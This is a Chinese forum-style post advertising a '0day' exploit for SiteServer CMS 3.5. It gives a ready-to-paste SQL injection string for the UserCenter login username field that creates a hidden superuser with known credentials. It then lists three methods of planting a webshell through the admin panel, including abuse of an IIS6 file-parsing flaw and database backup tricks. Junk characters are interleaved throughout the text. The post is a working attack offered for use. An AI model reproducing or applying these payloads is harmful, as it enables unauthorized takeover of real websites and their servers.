SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

stieserver官网:www.siteserver.cn
& X/ k- W0 s5 L9 Q% R2 Y8 ]# k2 i

; v2 B: z- }+ `+ {5 T, n* Z
EXP:

. U5 ]- v' L4 M) @" T直接访问UserCenter/login.aspx
  E* v) S# p- _, K# O/ x

: _0 c; _  X+ R- |! M
6 e6 w8 y2 y" r& P$ T3 m用户名处输入：
* F# T/ X' V2 M" N
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--



; g) z: x( E" R6 f& }$ j密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
/ C, I" E! D% Q# A/ h. G8 l


之后再访问后台SiteServer/login.aspx用插入的用户登陆

3 H# H* |( w8 m5 H: d# k2 z  I
  J) V5 D. `. I- P2 I3 {4 E) A. ~
后台拿webshell的三种方法：

+ U9 M5 x* w9 l, _  U% l5 S: Y一、

( O3 u  C! p+ v站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
" u: @1 q6 d( L! B$ e4 d5 Q2 E5 D
4 f' P6 A2 h: Z$ _二、
: v! q. |5 F& C; _5 ^: r2 A/ {1 s
& y' }3 o9 L( G* n- X5 R成员权限-》添加用户-》用户名为：1.asp
# J# c% J  \: _
8 b+ {. U3 J4 \: ]% Y. ]% ]http://127.0.0.1/usercenter/
3 X: {' N. M3 r% A0 H  t) u8 ^
- W$ C" t9 t. @! M! v# W& D用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

3 B+ k4 ]& O  B3 |) H9 Y（ps：后台添加用户时不会验证是否含有非法字符）
. P( q( V; s; i5 H
6 R+ j+ _% m! `! {( @三、
1 \$ U/ I( i  f( Q
系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径
6 B" y! G$ P/ c% O( T: g
系统工具-》数据库工具-》SQL语句查询
/ O. S- A/ P- ]; n) d这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
. d. h% m8 L$ E# S2 }7 @, i